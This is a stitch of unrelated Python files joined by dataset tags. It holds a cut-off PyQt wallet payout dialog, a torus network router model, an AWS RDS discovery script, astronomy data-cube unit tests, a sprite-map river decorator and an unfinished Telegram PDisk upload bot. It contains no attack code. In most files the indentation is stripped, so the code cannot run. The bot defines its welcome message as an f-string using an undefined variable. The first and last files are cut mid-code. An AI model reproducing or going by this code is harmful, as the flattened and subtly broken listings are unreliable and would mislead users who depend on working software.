self.lblSourceBip32Path = QtWidgets.QLabel(self.wdg_address_source_2)
self.lblSourceBip32Path.setObjectName("lblSourceBip32Path")
self.horizontalLayout_2.addWidget(self.lblSourceBip32Path)
self.edt_src_bip32_path = QtWidgets.QLineEdit(self.wdg_address_source_2)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.edt_src_bip32_path.sizePolicy().hasHeightForWidth())
self.edt_src_bip32_path.setSizePolicy(sizePolicy)
self.edt_src_bip32_path.setMaximumSize(QtCore.QSize(100, 16777215))
self.edt_src_bip32_path.setStyleSheet("background-color: lightgray;")
self.edt_src_bip32_path.setReadOnly(True)
self.edt_src_bip32_path.setObjectName("edt_src_bip32_path")
self.horizontalLayout_2.addWidget(self.edt_src_bip32_path)
self.btn_src_bip32_path = QtWidgets.QToolButton(self.wdg_address_source_2)
self.btn_src_bip32_path.setObjectName("btn_src_bip32_path")
self.horizontalLayout_2.addWidget(self.btn_src_bip32_path)
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem1)
self.sw_address_source.addWidget(self.wdg_address_source_2)
self.wdg_address_source_3 = QtWidgets.QWidget()
self.wdg_address_source_3.setObjectName("wdg_address_source_3")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.wdg_address_source_3)
self.horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout.setObjectName("horizontalLayout")
self.lbl_src_masternode = QtWidgets.QLabel(self.wdg_address_source_3)
self.lbl_src_masternode.setObjectName("lbl_src_masternode")
self.horizontalLayout.addWidget(self.lbl_src_masternode)
self.cbo_src_masternodes = QtWidgets.QComboBox(self.wdg_address_source_3)
self.cbo_src_masternodes.setObjectName("cbo_src_masternodes")
self.horizontalLayout.addWidget(self.cbo_src_masternodes)
spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem2)
self.sw_address_source.addWidget(self.wdg_address_source_3)
self.lay_input.addWidget(self.sw_address_source)
self.btnLoadTransactions = QtWidgets.QPushButton(self.pnl_input)
self.btnLoadTransactions.setAutoDefault(False)
self.btnLoadTransactions.setObjectName("btnLoadTransactions")
self.lay_input.addWidget(self.btnLoadTransactions)
spacerItem3 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.lay_input.addItem(spacerItem3)
self.verticalLayout_4.addLayout(self.lay_input)
self.verticalLayout.addWidget(self.pnl_input)
self.splitter = QtWidgets.QSplitter(SendPayoutDlg)
self.splitter.setOrientation(QtCore.Qt.Vertical)
self.splitter.setObjectName("splitter")
self.main_widget = QtWidgets.QWidget(self.splitter)
self.main_widget.setObjectName("main_widget")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.main_widget)
self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_2.setSpacing(2)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.lbl_message_2 = QtWidgets.QLabel(self.main_widget)
self.lbl_message_2.setText("")
self.lbl_message_2.setOpenExternalLinks(True)
self.lbl_message_2.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse|QtCore.Qt.TextSelectableByMouse)
self.lbl_message_2.setObjectName("lbl_message_2")
self.verticalLayout_2.addWidget(self.lbl_message_2)
self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
self.horizontalLayout_4.setContentsMargins(-1, 8, -1, -1)
self.horizontalLayout_4.setSpacing(6)
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.btnCheckAll = QtWidgets.QToolButton(self.main_widget)
self.btnCheckAll.setToolTip("")
self.btnCheckAll.setIconSize(QtCore.QSize(12, 12))
self.btnCheckAll.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)
self.btnCheckAll.setObjectName("btnCheckAll")
self.horizontalLayout_4.addWidget(self.btnCheckAll)
self.btnUncheckAll = QtWidgets.QToolButton(self.main_widget)
self.btnUncheckAll.setToolTip("")
self.btnUncheckAll.setIconSize(QtCore.QSize(12, 12))
self.btnUncheckAll.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)
self.btnUncheckAll.setObjectName("btnUncheckAll")
self.horizontalLayout_4.addWidget(self.btnUncheckAll)
self.chbHideCollateralTx = QtWidgets.QCheckBox(self.main_widget)
self.chbHideCollateralTx.setStyleSheet("")
self.chbHideCollateralTx.setObjectName("chbHideCollateralTx")
self.horizontalLayout_4.addWidget(self.chbHideCollateralTx)
self.lbl_message = QtWidgets.QLabel(self.main_widget)
self.lbl_message.setStyleSheet("margin-left:20px;\n"
"font-size:11px;\n"
"background-color: rgb(56, 181, 255);\n"
"color: rgb(255, 255, 255);")
self.lbl_message.setWordWrap(False)
self.lbl_message.setOpenExternalLinks(True)
self.lbl_message.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse|QtCore.Qt.TextSelectableByMouse)
self.lbl_message.setObjectName("lbl_message")
self.horizontalLayout_4.addWidget(self.lbl_message)
spacerItem4 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_4.addItem(spacerItem4)
self.verticalLayout_2.addLayout(self.horizontalLayout_4)
self.tableView = QtWidgets.QTableView(self.main_widget)
self.tableView.setSizeAdjustPolicy(QtWidgets.QAbstractScrollArea.AdjustToContentsOnFirstShow)
self.tableView.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)
self.tableView.setShowGrid(True)
self.tableView.setSortingEnabled(False)
self.tableView.setObjectName("tableView")
self.tableView.verticalHeader().setVisible(False)
self.tableView.verticalHeader().setCascadingSectionResizes(True)
self.tableView.verticalHeader().setHighlightSections(False)
self.verticalLayout_2.addWidget(self.tableView)
self.dest_widget1 = QtWidgets.QWidget(self.splitter)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.dest_widget1.sizePolicy().hasHeightForWidth())
self.dest_widget1.setSizePolicy(sizePolicy)
self.dest_widget1.setObjectName("dest_widget1")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.dest_widget1)
self.verticalLayout_3.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.dest_widget = QtWidgets.QFrame(self.dest_widget1)
self.dest_widget.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.dest_widget.setObjectName("dest_widget")
self.verticalLayout_3.addWidget(self.dest_widget)
self.verticalLayout.addWidget(self.splitter)
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
spacerItem5 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem5)
self.btnSend = QtWidgets.QPushButton(SendPayoutDlg)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btnSend.sizePolicy().hasHeightForWidth())
self.btnSend.setSizePolicy(sizePolicy)
self.btnSend.setMinimumSize(QtCore.QSize(200, 0))
self.btnSend.setMaximumSize(QtCore.QSize(200, 16777215))
self.btnSend.setAutoDefault(False)
self.btnSend.setObjectName("btnSend")
self.horizontalLayout_3.addWidget(self.btnSend)
spacerItem6 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem6)
self.btnClose = QtWidgets.QPushButton(SendPayoutDlg)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btnClose.sizePolicy().hasHeightForWidth())
self.btnClose.setSizePolicy(sizePolicy)
self.btnClose.setMinimumSize(QtCore.QSize(0, 0))
self.btnClose.setLayoutDirection(QtCore.Qt.LeftToRight)
self.btnClose.setAutoDefault(False)
self.btnClose.setObjectName("btnClose")
self.horizontalLayout_3.addWidget(self.btnClose, 0, QtCore.Qt.AlignRight)
self.verticalLayout.addLayout(self.horizontalLayout_3)
self.retranslateUi(SendPayoutDlg)
self.sw_address_source.setCurrentIndex(2)
QtCore.QMetaObject.connectSlotsByName(SendPayoutDlg)
def retranslateUi(self, SendPayoutDlg):
_translate = QtCore.QCoreApplication.translate
SendPayoutDlg.setWindowTitle(_translate("SendPayoutDlg", "Dialog"))
self.label_3.setText(_translate("SendPayoutDlg", "View as"))
self.cbo_address_source_mode.setItemText(0, _translate("SendPayoutDlg", "Wallet Account"))
self.cbo_address_source_mode.setItemText(1, _translate("SendPayoutDlg", "BIP32 Path"))
self.cbo_address_source_mode.setItemText(2, _translate("SendPayoutDlg", "Ghostnode Address"))
self.lbl_account.setText(_translate("SendPayoutDlg", "Account "))
self.btn_add_hw_account_nr.setToolTip(_translate("SendPayoutDlg", "Add new account number"))
self.btn_add_hw_account_nr.setText(_translate("SendPayoutDlg", "."))
self.lbl_hw_account_base_path.setText(_translate("SendPayoutDlg", "..."))
self.lblSourceBip32Path.setText(_translate("SendPayoutDlg", "BIP32 path"))
self.btn_src_bip32_path.setToolTip(_translate("SendPayoutDlg", "Change BIP32 path"))
self.btn_src_bip32_path.setText(_translate("SendPayoutDlg", "..."))
self.lbl_src_masternode.setText(_translate("SendPayoutDlg", "Ghostnode"))
self.btnLoadTransactions.setText(_translate("SendPayoutDlg", "Reload"))
self.btnCheckAll.setText(_translate("SendPayoutDlg", "Select All"))
self.btnUncheckAll.setText(_translate("SendPayoutDlg", "Unselect All"))
self.chbHideCollateralTx.setText(_translate("SendPayoutDlg", "Hide collateral utxos"))
self.lbl_message.setText(_translate("SendPayoutDlg", "...."))
self.btnSend.setText(_translate("SendPayoutDlg", "Prepare Transaction"))
self.btnClose.setText(_translate("SendPayoutDlg", "Close"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
SendPayoutDlg = QtWidgets.QDialog()
ui = Ui_SendPayoutDlg()
ui.setupUi(SendPayoutDlg)
SendPayoutDlg.show()
sys.exit(app.exec_())
|
nilq/baby-python
|
python
|
"""
==========================================================================
TorusRouterFL.py
==========================================================================
FL route unit that implements dimension order routing.
Author : Yanghui Ou
Date : June 30, 2019
"""
from pymtl3 import *
from .directions import *
from .RouteUnitDorFL import RouteUnitDorFL
class TorusRouterFL:
def __init__( s, pos_x, pos_y, ncols, nrows, dimension='y' ):
s.pos_x = pos_x
s.pos_y = pos_y
s.ncols = ncols
s.nrows = nrows
s.dimension = dimension
    s.route_unit = RouteUnitDorFL( pos_x, pos_y, ncols, nrows, dimension=dimension )
#-----------------------------------------------------------------------
# arrange_src_pkts
#-----------------------------------------------------------------------
# A helper function that puts each packet in [lst] into corresponding
# source.
  def arrange_src_pkts( s, lst ):
    src_pkts = [ [] for _ in range(5) ]
    for pkt in lst:
      # Extract coordinates up front so both dimension branches can use them
      src_x = pkt.src_x.uint()
      src_y = pkt.src_y.uint()
      dst_x = pkt.dst_x.uint()
      dst_y = pkt.dst_y.uint()
      if src_x == s.pos_x and src_y == s.pos_y:
        in_dir = SELF
      elif s.dimension == 'y':
        # Same x - either comes from north or south
        if src_x == s.pos_x:
          north_dist = dst_y - src_y if dst_y > src_y else dst_y + s.nrows - src_y
          south_dist = src_y - dst_y if dst_y < src_y else src_y + s.nrows - dst_y
          in_dir = SOUTH if north_dist < south_dist else NORTH
        # Different x - either comes from west or east
        else:
          east_dist = dst_x - src_x if dst_x > src_x else dst_x + s.ncols - src_x
          west_dist = src_x - dst_x if dst_x < src_x else src_x + s.ncols - dst_x
          in_dir = EAST if west_dist < east_dist else WEST
      else: # s.dimension=='x'
        # Same y - either comes from west or east
        if src_y == s.pos_y:
          east_dist = dst_x - src_x if dst_x > src_x else dst_x + s.ncols - src_x
          west_dist = src_x - dst_x if dst_x < src_x else src_x + s.ncols - dst_x
          in_dir = EAST if west_dist < east_dist else WEST
        # Different y - either comes from north or south
        else:
          north_dist = dst_y - src_y if dst_y > src_y else dst_y + s.nrows - src_y
          south_dist = src_y - dst_y if dst_y < src_y else src_y + s.nrows - dst_y
          in_dir = SOUTH if north_dist < south_dist else NORTH
      src_pkts[ in_dir ].append( pkt )
    return src_pkts
#-----------------------------------------------------------------------
# route
#-----------------------------------------------------------------------
# Use FL route unit to route each packet in [src_pkts] to corresponding
# destination.
def route( s, src_pkts ):
assert len( src_pkts ) == 5
dst_pkts = [ [] for _ in range(5) ]
for pkts in src_pkts:
tmp = s.route_unit.route( pkts )
for i in range(5):
dst_pkts[i].extend( tmp[i] )
return dst_pkts
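  #-----------------------------------------------------------------------
  # usage sketch
  #-----------------------------------------------------------------------
  # A minimal, hypothetical driver (not part of the original file): build a
  # 4x4 torus router, bucket packets by their inferred input port, then
  # route them. Packets only need Bits-like coordinate fields with .uint().
  #
  #   from types import SimpleNamespace
  #   from pymtl3 import Bits4
  #
  #   def mk_pkt( src_x, src_y, dst_x, dst_y ):
  #     return SimpleNamespace( src_x=Bits4(src_x), src_y=Bits4(src_y),
  #                             dst_x=Bits4(dst_x), dst_y=Bits4(dst_y) )
  #
  #   router   = TorusRouterFL( pos_x=1, pos_y=1, ncols=4, nrows=4 )
  #   src_pkts = router.arrange_src_pkts( [ mk_pkt(1, 1, 2, 3), mk_pkt(0, 1, 1, 1) ] )
  #   dst_pkts = router.route( src_pkts )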
|
nilq/baby-python
|
python
|
import json
from common.methods import set_progress
from resourcehandlers.aws.models import AWSHandler
from botocore.exceptions import ClientError
RESOURCE_IDENTIFIER = 'db_identifier'
def boto_instance_to_dict(boto_instance):
"""
Create a pared-down representation of an RDS instance from the full boto
dictionary.
"""
instance = {
'identifier': boto_instance['DBInstanceIdentifier'],
'engine': boto_instance['Engine'],
'status': boto_instance['DBInstanceStatus'],
'username': boto_instance['MasterUsername'],
}
# Endpoint may not be returned if networking is not set up yet
endpoint = boto_instance.get('Endpoint', {})
instance.update({
'address': endpoint.get('Address'),
'port': endpoint.get('Port')
})
return instance
def discover_resources(**kwargs):
discovered_rds_instances = []
for handler in AWSHandler.objects.all():
try:
wrapper = handler.get_api_wrapper()
set_progress('Connecting to Amazon RDS Instance for handler: {}'.format(handler))
except Exception as e:
set_progress(f"Could not get wrapper: {e}")
continue
for region in handler.current_regions():
rds = wrapper.get_boto3_client(
'rds',
handler.serviceaccount,
handler.servicepasswd,
region
)
try:
for instance in rds.describe_db_instances()['DBInstances']:
instance_dict = boto_instance_to_dict(instance)
discovered_rds_instances.append({
'db_identifier': instance['DBInstanceIdentifier'],
'aws_region': region,
'aws_rh_id': handler.id,
'rds_instance': json.dumps(instance_dict)
})
except ClientError as e:
set_progress('AWS ClientError: {}'.format(e))
continue
return discovered_rds_instances
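if __name__ == '__main__':
    # Quick self-contained check of boto_instance_to_dict using a fabricated
    # (hypothetical) boto response; 'Endpoint' is omitted on purpose to
    # exercise the fallback for instances whose networking is not yet set up.
    sample = {
        'DBInstanceIdentifier': 'demo-db',
        'Engine': 'postgres',
        'DBInstanceStatus': 'creating',
        'MasterUsername': 'admin',
    }
    print(boto_instance_to_dict(sample))
    # -> address and port come back as None until AWS reports an Endpoint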
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# @Author: Brian Cherinka, José Sánchez-Gallego, and Brett Andrews
# @Date: 2018-07-20
# @Filename: test_quantities.py
# @License: BSD 3-clause (http://www.opensource.org/licenses/BSD-3-Clause)
#
# @Last modified by: andrews
# @Last modified time: 2018-10-19 14:10:15
import matplotlib
import numpy
import pytest
from astropy import units as u
from tests import marvin_test_if
from marvin.tools.quantities import DataCube, Spectrum
spaxel_unit = u.Unit('spaxel', represents=u.pixel, doc='A spectral pixel', parse_strict='silent')
@pytest.fixture(scope='function')
def datacube():
"""Produces a simple 3D array for datacube testing."""
flux = numpy.tile([numpy.arange(1, 1001, dtype=numpy.float32)],
(100, 1)).T.reshape(1000, 10, 10)
ivar = (1. / (flux / 100))**2
    mask = numpy.zeros(flux.shape, dtype=int)  # numpy.int was removed in NumPy 1.24
wave = numpy.arange(1, 1001)
redcorr = numpy.ones(1000) * 1.5
mask[50:100, 5, 5] = 2**10
mask[500:600, 3, 3] = 2**4
scale = 1e-3
datacube = DataCube(flux, wave, ivar=ivar, mask=mask, redcorr=redcorr, scale=scale,
unit=u.erg / u.s / (u.cm ** 2) / u.Angstrom / spaxel_unit,
pixmask_flag='MANGA_DRP3PIXMASK')
yield datacube
@pytest.fixture(scope='function')
def spectrum():
"""Produces a simple 1D array for datacube testing."""
flux = numpy.arange(1, 1001, dtype=numpy.float32)
ivar = (1. / (flux / 100))**2
    mask = numpy.zeros(flux.shape, dtype=int)  # numpy.int was removed in NumPy 1.24
wave = numpy.arange(1, 1001)
mask[50:100] = 2**10
mask[500:600] = 2**4
scale = 1e-3
datacube = Spectrum(flux, wave, ivar=ivar, mask=mask, scale=scale,
unit=u.erg / u.s / (u.cm ** 2) / u.Angstrom / spaxel_unit,
pixmask_flag='MANGA_DRP3PIXMASK')
yield datacube
class TestDataCube(object):
def test_datacube(self, datacube):
assert datacube.value is not None
assert datacube.ivar is not None
assert datacube.mask is not None
numpy.testing.assert_array_equal(datacube.value.shape, datacube.ivar.shape)
numpy.testing.assert_array_equal(datacube.value.shape, datacube.mask.shape)
assert datacube.pixmask is not None
def test_masked(self, datacube):
assert isinstance(datacube.masked, numpy.ma.MaskedArray)
assert numpy.sum(datacube.masked.mask) == 50
datacube.pixmask_flag = None
assert numpy.sum(datacube.masked.mask) == 150
def test_snr(self, datacube):
assert datacube.snr[100, 5, 5] == pytest.approx(100)
def test_error(self, datacube):
numpy.testing.assert_almost_equal(datacube.error.value, numpy.sqrt(1 / datacube.ivar))
assert datacube.error.unit == datacube.unit
numpy.testing.assert_almost_equal(datacube.error.value, datacube.std.value)
def test_descale(self, datacube):
assert datacube.unit.scale == 1e-3
descaled = datacube.descale()
        assert descaled.unit.scale == 1
numpy.testing.assert_almost_equal(descaled.value, datacube.value * datacube.unit.scale)
numpy.testing.assert_almost_equal(descaled.ivar, datacube.ivar / datacube.unit.scale**2)
def test_redcorr(self, datacube):
der = datacube.deredden()
assert isinstance(der, DataCube)
numpy.testing.assert_allclose(der.value, datacube.value * 1.5)
numpy.testing.assert_allclose(der.ivar, datacube.ivar / 1.5**2)
numpy.testing.assert_allclose(der.mask, datacube.mask)
assert der.redcorr is None
assert der.pixmask_flag == datacube.pixmask_flag
new_redcorr = (numpy.ones(1000) * 2.)
new_der = datacube.deredden(redcorr=new_redcorr)
numpy.testing.assert_allclose(new_der.value, datacube.value * 2)
numpy.testing.assert_allclose(new_der.ivar, datacube.ivar / 2**2)
datacube.redcorr = None
with pytest.raises(ValueError):
datacube.deredden()
def test_slice_datacube(self, datacube):
new_datacube = datacube[:, 3:5, 3:5]
assert isinstance(new_datacube, DataCube)
numpy.testing.assert_almost_equal(new_datacube.value, datacube.value[:, 3:5, 3:5])
numpy.testing.assert_almost_equal(new_datacube.ivar, datacube.ivar[:, 3:5, 3:5])
numpy.testing.assert_almost_equal(new_datacube.mask, datacube.mask[:, 3:5, 3:5])
numpy.testing.assert_almost_equal(new_datacube.redcorr, datacube.redcorr)
assert new_datacube.pixmask_flag == datacube.pixmask_flag
def test_slice_wave(self, datacube):
new_datacube = datacube[10:100]
assert isinstance(new_datacube, DataCube)
numpy.testing.assert_almost_equal(new_datacube.value, datacube.value[10:100, :, :])
numpy.testing.assert_almost_equal(new_datacube.ivar, datacube.ivar[10:100, :, :])
numpy.testing.assert_almost_equal(new_datacube.mask, datacube.mask[10:100, :, :])
numpy.testing.assert_almost_equal(new_datacube.redcorr, datacube.redcorr[10:100])
assert new_datacube.pixmask_flag == datacube.pixmask_flag
def test_slice_spectrum(self, datacube):
new_spectrum = datacube[:, 5, 5]
assert isinstance(new_spectrum, Spectrum)
numpy.testing.assert_almost_equal(new_spectrum.value, datacube.value[:, 5, 5])
numpy.testing.assert_almost_equal(new_spectrum.ivar, datacube.ivar[:, 5, 5])
numpy.testing.assert_almost_equal(new_spectrum.mask, datacube.mask[:, 5, 5])
assert new_spectrum.pixmask_flag == datacube.pixmask_flag
@marvin_test_if(mark='include', cube={'plateifu': '8485-1901',
'data_origin': 'file',
'initial_mode': 'local'})
def test_cube_quantities(self, cube):
assert cube.flux is not None
assert isinstance(cube.flux, numpy.ndarray)
assert isinstance(cube.flux, DataCube)
assert isinstance(cube.spectral_resolution, Spectrum)
if cube.release in ['MPL-4', 'MPL-5']:
with pytest.raises(AssertionError) as ee:
cube.spectral_resolution_prepixel
            assert 'spectral_resolution_prepixel is not present in this MPL version' in str(ee)
else:
assert isinstance(cube.spectral_resolution_prepixel, Spectrum)
assert cube.flux.pixmask.values_to_bits(3) == [0, 1]
assert cube.flux.pixmask.values_to_labels(3) == ['NOCOV', 'LOWCOV']
@pytest.mark.parametrize('names, expected', [(['NOCOV', 'LOWCOV'], 3),
('DONOTUSE', 1024)])
def test_labels_to_value(self, cube, names, expected):
assert cube.flux.pixmask.labels_to_value(names) == expected
@marvin_test_if(mark='include', modelcube={'plateifu': '8485-1901',
'data_origin': 'file',
'initial_mode': 'local'})
def test_modelcube_quantities(self, modelcube):
for mc in modelcube.datamodel:
if hasattr(modelcube, mc.name):
modelcube_quantity = getattr(modelcube, mc.name)
assert isinstance(modelcube_quantity, DataCube)
assert modelcube_quantity.pixmask_flag == 'MANGA_DAPSPECMASK'
class TestSpectrum(object):
def test_spectrum(self, spectrum):
assert spectrum.value is not None
assert spectrum.ivar is not None
assert spectrum.mask is not None
numpy.testing.assert_array_equal(spectrum.value.shape, spectrum.ivar.shape)
numpy.testing.assert_array_equal(spectrum.value.shape, spectrum.mask.shape)
assert spectrum.pixmask is not None
def test_masked(self, spectrum):
assert isinstance(spectrum.masked, numpy.ma.MaskedArray)
assert numpy.sum(spectrum.masked.mask) == 50
spectrum.pixmask_flag = None
assert numpy.sum(spectrum.masked.mask) == 150
def test_snr(self, spectrum):
assert spectrum.snr[100] == pytest.approx(100)
def test_error(self, spectrum):
numpy.testing.assert_almost_equal(spectrum.error.value, numpy.sqrt(1 / spectrum.ivar))
assert spectrum.error.unit == spectrum.unit
numpy.testing.assert_almost_equal(spectrum.error.value, spectrum.std.value)
def test_descale(self, spectrum):
assert spectrum.unit.scale == 1e-3
descaled = spectrum.descale()
        assert descaled.unit.scale == 1
numpy.testing.assert_almost_equal(descaled.value, spectrum.value * spectrum.unit.scale)
numpy.testing.assert_almost_equal(descaled.ivar, spectrum.ivar / spectrum.unit.scale**2)
def test_slice_spectrum(self, spectrum):
new_spectrum = spectrum[10:100]
assert isinstance(new_spectrum, Spectrum)
numpy.testing.assert_almost_equal(new_spectrum.value, spectrum.value[10:100])
numpy.testing.assert_almost_equal(new_spectrum.ivar, spectrum.ivar[10:100])
numpy.testing.assert_almost_equal(new_spectrum.mask, spectrum.mask[10:100])
assert new_spectrum.pixmask_flag == spectrum.pixmask_flag
@marvin_test_if(mark='include', cube={'plateifu': '8485-1901',
'data_origin': 'file',
'initial_mode': 'local'})
def test_cube_quantities(self, cube):
for sp in cube.datamodel.spectra:
cube_quantity = getattr(cube, sp.name)
assert isinstance(cube_quantity, Spectrum)
assert cube_quantity.pixmask_flag is None
def test_plot(self, spectrum):
ax = spectrum.plot(show_std=True)
assert isinstance(ax, matplotlib.axes.Axes)
def test_plot_no_std_no_mask(self):
sp = Spectrum(numpy.random.randn(1000), wavelength=numpy.arange(1000))
sp.plot()
def test_plot_no_std(self):
        mask = numpy.zeros(1000, dtype=int)  # numpy.int was removed in NumPy 1.24
mask[50:100] = 2**10
mask[500:600] = 2**4
sp = Spectrum(
flux=numpy.random.randn(1000),
wavelength=numpy.arange(1000),
mask=mask,
pixmask_flag='MANGA_DRP3PIXMASK',
)
sp.plot()
def test_plot_no_mask(self):
flux = numpy.random.randn(1000)
ivar = (1. / (flux / 100))**2
sp = Spectrum(
flux=flux,
wavelength=numpy.arange(1000),
ivar=ivar,
)
sp.plot()
|
nilq/baby-python
|
python
|
from .orientationDictionary import OrientationDictionary
from copy import deepcopy
class RiverDecorator:
def updateCells(
self, matrix, WATER_SPRITE_INDEX, waterSpot, GROUND_SPRITE_INDEX, waterSprites
):
orientationDictionary = OrientationDictionary(waterSprites)
spriteDict = orientationDictionary.spriteDict
cornerDict = orientationDictionary.cornerDict
tempMatrix = deepcopy(matrix)
        # Edge-adjacent neighbors are matched against the side-sprite
        # dictionary, diagonal neighbors against the corner-sprite dictionary.
        edge_offsets = ((-1, 0), (1, 0), (0, -1), (0, 1))
        corner_offsets = ((-1, -1), (-1, 1), (1, -1), (1, 1))
        for row, column in waterSpot:
            for d_row, d_col in edge_offsets:
                self.checkNeighbors(
                    row + d_row,
                    column + d_col,
                    matrix,
                    tempMatrix,
                    GROUND_SPRITE_INDEX,
                    WATER_SPRITE_INDEX,
                    spriteDict,
                    False,
                )
            for d_row, d_col in corner_offsets:
                self.checkNeighbors(
                    row + d_row,
                    column + d_col,
                    matrix,
                    tempMatrix,
                    GROUND_SPRITE_INDEX,
                    WATER_SPRITE_INDEX,
                    cornerDict,
                    True,
                )
        return tempMatrix
def checkNeighbors(
self,
row,
column,
matrix,
tempMatrix,
GROUND_SPRITE_INDEX,
WATER_SPRITE_INDEX,
spriteDict,
corner,
):
if (
0 <= row < len(matrix)
and 0 <= column < len(matrix[0])
and matrix[row][column] != WATER_SPRITE_INDEX
):
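            # 3x3 neighborhood map centered on (row, column); 1 marks a water cell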
cellInfo = [[0, 0, 0], [0, 1, 0], [0, 0, 0]]
self.fillCellInfo(cellInfo, row, column, matrix, WATER_SPRITE_INDEX, corner)
for spriteInfo in spriteDict:
if not corner:
if cellInfo in spriteInfo[0]:
tempMatrix[row][column] = spriteInfo[1]
else:
if cellInfo in spriteInfo:
tempMatrix[row][column] = spriteInfo[1]
def fillCellInfo(self, cellInfo, row, col, matrix, spriteToCheck, corner):
if (
0 <= row - 1 < len(matrix)
and 0 <= col < len(matrix[0])
and matrix[row - 1][col] == spriteToCheck
):
cellInfo[0][1] = 1
if (
0 <= row + 1 < len(matrix)
and 0 <= col < len(matrix[0])
and matrix[row + 1][col] == spriteToCheck
):
cellInfo[2][1] = 1
if (
0 <= row < len(matrix)
and 0 <= col + 1 < len(matrix[0])
and matrix[row][col + 1] == spriteToCheck
):
cellInfo[1][2] = 1
if (
0 <= row < len(matrix)
and 0 <= col - 1 < len(matrix[0])
and matrix[row][col - 1] == spriteToCheck
):
cellInfo[1][0] = 1
if corner:
if (
0 <= row - 1 < len(matrix)
and 0 <= col - 1 < len(matrix[0])
and matrix[row - 1][col - 1] == spriteToCheck
):
cellInfo[0][0] = 1
if (
0 <= row - 1 < len(matrix)
and 0 <= col + 1 < len(matrix[0])
and matrix[row - 1][col + 1] == spriteToCheck
):
cellInfo[0][2] = 1
if (
0 <= row + 1 < len(matrix)
and 0 <= col + 1 < len(matrix[0])
and matrix[row + 1][col + 1] == spriteToCheck
):
cellInfo[2][2] = 1
if (
0 <= row + 1 < len(matrix)
and 0 <= col - 1 < len(matrix[0])
and matrix[row + 1][col - 1] == spriteToCheck
):
cellInfo[2][0] = 1
|
nilq/baby-python
|
python
|
from telethon import TelegramClient, events, Button
import requests
import os
import shutil
import cryptg  # optional: Telethon picks it up automatically for faster crypto
d = os.environ.get("d")
APP_ID = int(os.environ.get("APP_ID", 0))
API_HASH = os.environ.get("API_HASH", "")
BOT_TOKEN = os.environ.get("BOT_TOKEN", "")
PDISK_API = os.environ.get("PDISK_API", "")
client = TelegramClient('pdisk_bot', APP_ID, API_HASH)
#=============================================================================================================================================
START_MSG = f"Hey {message.from_user.first_name} \n I Am A Pdisk Uploader Bot... \n I Can Upload Telegram Files/Direct Link And Return You Back With Pdisk Url..!! \n\n <b>Maintained by</b> : @RUBANDURAI27"
START_IMG = 'https://telegra.ph/file/29d4cbc0f511a7b73fa78.jpg'
HELP_MSG = "<b>Help Menu </b>\n\nJust Send Me An Direct Download Link To Upload That To Your PDisk ID. You Can Use /upload command to Get Direct Download Link For Telegram Video Files! \n\n <b>Available Commands </b>\n \n /help - How to use me \n /upload - File to Direct link \n /url - Link to Pdisk \n /telepdisk - File to Pdisk \n\n @POWERROCKERS"
#=============================================================================================================================================
@client.on(events.NewMessage(pattern='(?i)/start'))
async def start_handler(event):
    chat = await event.get_chat()
    sender = await event.get_sender()
    await client.send_message(chat, START_MSG.format(first_name=sender.first_name), parse_mode='html')
    await client.send_file(chat, START_IMG)
@client.on(events.NewMessage(pattern='/help'))
async def help_handler(event):
    chat = await event.get_chat()
    await client.send_message(chat, HELP_MSG, parse_mode='html')
@client.on(events.NewMessage(pattern='/diskusage'))
async def diskusage_handler(event):
    chat = await event.get_chat()
    stat = shutil.disk_usage("/app/templates/download")
    await client.send_message(chat, str(stat))
@client.on(events.NewMessage(pattern='/url'))
async def url_handler(event):
    link = event.text.split(' ')[1]
    title = event.text.split(' ')[2]
    chat = await event.get_chat()
